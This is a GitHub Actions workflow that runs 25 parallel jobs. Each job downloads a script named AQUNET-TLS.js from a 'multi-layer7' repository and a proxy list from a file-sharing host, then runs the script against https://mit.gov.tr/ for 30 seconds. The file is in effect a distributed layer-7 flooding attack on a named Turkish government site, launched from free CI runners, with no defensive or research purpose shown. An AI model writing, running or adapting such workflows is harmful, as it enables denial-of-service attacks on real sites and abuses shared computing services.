name: Ubuntu VDS 30 saniye Aqu !

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]

    steps:
      - name: OK !
        run: |
          wget https://github.com/kadinkatilii/multi-layer7/raw/refs/heads/main/AQUNET-TLS.js
          wgethttps://up.zip/9fpdq/proxies.txt
          npm i user-agents
          timeout 30 node AQUNET-TLS.js https://mit.gov.tr/ 30 64 8 proxies.txt
          
      - name: OK !
        run: |
          sleep 30
          exit 0
